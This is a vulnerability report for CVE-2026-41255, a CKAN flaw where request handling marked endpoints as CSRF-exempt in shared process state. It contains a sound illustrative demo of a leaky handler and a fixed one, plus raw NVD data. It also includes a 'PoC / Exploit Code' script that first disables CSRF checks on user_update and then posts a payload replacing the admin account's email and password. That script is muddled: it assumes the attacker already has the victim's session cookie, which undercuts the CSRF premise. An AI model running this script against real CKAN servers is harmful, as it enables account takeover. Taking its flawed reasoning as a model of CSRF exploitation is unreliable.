Security Vulnerability Report
CVE-2026-41255 CVSS 6.1 MEDIUM

CVE-2026-41255

Published: 2026-05-13 19:17:22
Last Modified: 2026-05-14 16:26:50

Description

CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.10 and 2.11.5, access to the views via tokens or unauthenticated requests marked the endpoint as not requiring CSRF protection. The marking was a member variable in flask-wtf.csrf.CSRFProtect(), which was stored as a module-level variable in the flask_app middleware. This API was never intended for request-level changes; it is primarily a decorator for static configuration. An unauthenticated request could hit a protected endpoint, exempting it from CSRF protection for the life of the particular server process (e.g. one worker of uwsgi). This vulnerability is fixed in 2.10.10 and 2.11.5.
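The bug class above is a per-request decision written into process-wide state. The following is an added illustration written for this report; it is not CKAN's or flask-wtf's code. It models the exempt list of a CSRFProtect-style object as a plain Python set, shows the flawed handler that mutates that set when a token-authenticated or unauthenticated request arrives, and the corrected handler that keeps the "skip CSRF" decision on the request. The Request class, endpoint name, token values and the csrf_valid() rule are all constructed for the demonstration.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional, Set


@dataclass
class Request:
    """Constructed stand-in for an HTTP request (not flask's Request object)."""
    method: str
    endpoint: str
    api_token: Optional[str] = None       # bearer/API token: not a browser session
    session_cookie: Optional[str] = None  # cookie auth: the CSRF-relevant case
    csrf_token: Optional[str] = None      # token carried in a header or form field


class CsrfRegistry:
    """Models a CSRFProtect-style exempt list: one instance for the whole process."""

    def __init__(self) -> None:
        # Intended to be filled once at import time by a decorator, never per request.
        self.exempt_views: Set[str] = set()

    def exempt(self, endpoint: str) -> None:
        self.exempt_views.add(endpoint)

    def requires_check(self, endpoint: str) -> bool:
        return endpoint not in self.exempt_views


def csrf_valid(req: Request) -> bool:
    # Constructed check: the submitted token must match the one bound to the session.
    return req.csrf_token is not None and req.csrf_token == f"csrf-for-{req.session_cookie}"


# Flawed pattern: a fact about the *current* request is written into shared state.
def handle_leaky(registry: CsrfRegistry, req: Request) -> str:
    if req.api_token or not req.session_cookie:
        registry.exempt(req.endpoint)  # BUG: persists for the life of the worker
    if req.method == "POST" and registry.requires_check(req.endpoint) and not csrf_valid(req):
        return "403 CSRF check failed"
    return "200 OK"


# Corrected pattern: the decision is request-scoped; the registry is never mutated.
def handle_fixed(registry: CsrfRegistry, req: Request) -> str:
    skip_csrf = bool(req.api_token) or not req.session_cookie
    if (req.method == "POST" and not skip_csrf
            and registry.requires_check(req.endpoint) and not csrf_valid(req)):
        return "403 CSRF check failed"
    return "200 OK"


def replay(handler: Callable[[CsrfRegistry, Request], str]) -> List[str]:
    """Run the same two-request sequence against a fresh registry; return the statuses."""
    registry = CsrfRegistry()
    # 1) a token-authenticated GET touches the endpoint (constructed traffic)
    first = handler(registry, Request("GET", "user_update", api_token="tok-123"))
    # 2) a later cookie-authenticated POST arrives carrying no CSRF token at all
    second = handler(registry, Request("POST", "user_update", session_cookie="sess-abc"))
    return [first, second]


if __name__ == "__main__":
    print("leaky:", replay(handle_leaky))  # second request wrongly passes
    print("fixed:", replay(handle_fixed))  # second request is rejected
```

With the leaky handler the second request returns 200 although it is a cookie-authenticated POST with no CSRF token, because the first request poisoned the shared set; with the fixed handler the same sequence yields a 403 on the second request while legitimate token-bearing POSTs and API-token requests still succeed. The general rule the example demonstrates: anything an extension exposes as static configuration (exempt lists, decorator registries) must not be touched from request handling code.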

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)


CKAN < 2.10.10
CKAN < 2.11.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target configuration
target_host = "http://localhost:5000"
vulnerable_endpoint = "/api/3/action/user_update"
url = f"{target_host}{vulnerable_endpoint}"

# Step 1: Send an unauthenticated request to trigger the exemption
# This exploits the logic where the module-level variable is modified
print("[+] Step 1: Sending unauthenticated request to disable CSRF protection...")
try:
    # The specific endpoint that triggers the vulnerability logic
    trigger_response = requests.get(url)
    if trigger_response.status_code != 404:
        print("[+] Endpoint hit, CSRF protection likely disabled for this worker.")
except Exception as e:
    print(f"[-] Error hitting trigger: {e}")

# Step 2: Exploit - Send a malicious request without CSRF token
# Assuming the attacker has a valid session cookie (e.g., via XSS or session hijacking)
# or if the endpoint allows state changes without auth (less likely for user_update, but demonstrates the bypass)
malicious_payload = {
    "id": "admin",
    "email": "[email protected]",
    "password": "newpassword123"
}

# Note: No CSRF token is included in headers or data
headers = {
    "Content-Type": "application/json",
    "Cookie": "auth_tkt=..."  # Replace with valid session cookie if needed
}

print("[+] Step 2: Sending payload without CSRF token...")
exploit_response = requests.post(url, json=malicious_payload, headers=headers)

if exploit_response.status_code == 200:
    print(f"[+] Exploit successful! Response: {exploit_response.text}")
else:
    print(f"[-] Exploit failed. Status: {exploit_response.status_code}")

References

https://github.com/Shirshaw64p/security-advisories/tree/main/CVE-2026-41255
https://github.com/ckan/ckan/security/advisories/GHSA-mcvf-jxcw-vj73

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41255", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:22.127", "lastModified": "2026-05-14T16:26:50.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.10 and 2.11.5, Access to the views via tokens or unauthenticated requests marked the endpoint as not requiring CSRF protection. The marking was a member variable in flask-wtf.csrf.CSRFProtect(), which was stored as a module level variable in the flask_app middleware. This API was never intended for request level changes, it is primarily a decorator for static configuration. An unauthenticated request could hit a protected endpoint, exempting it from CSRF protection for the life of the particular server process. (e.g. one worker of uwsgi). This vulnerability is fixed in 2.10.10 and 2.11.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/Shirshaw64p/security-advisories/tree/main/CVE-2026-41255", "source": "[email protected]"}, {"url": "https://github.com/ckan/ckan/security/advisories/GHSA-mcvf-jxcw-vj73", "source": "[email protected]"}, {"url": "https://github.com/ckan/ckan/security/advisories/GHSA-mcvf-jxcw-vj73", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}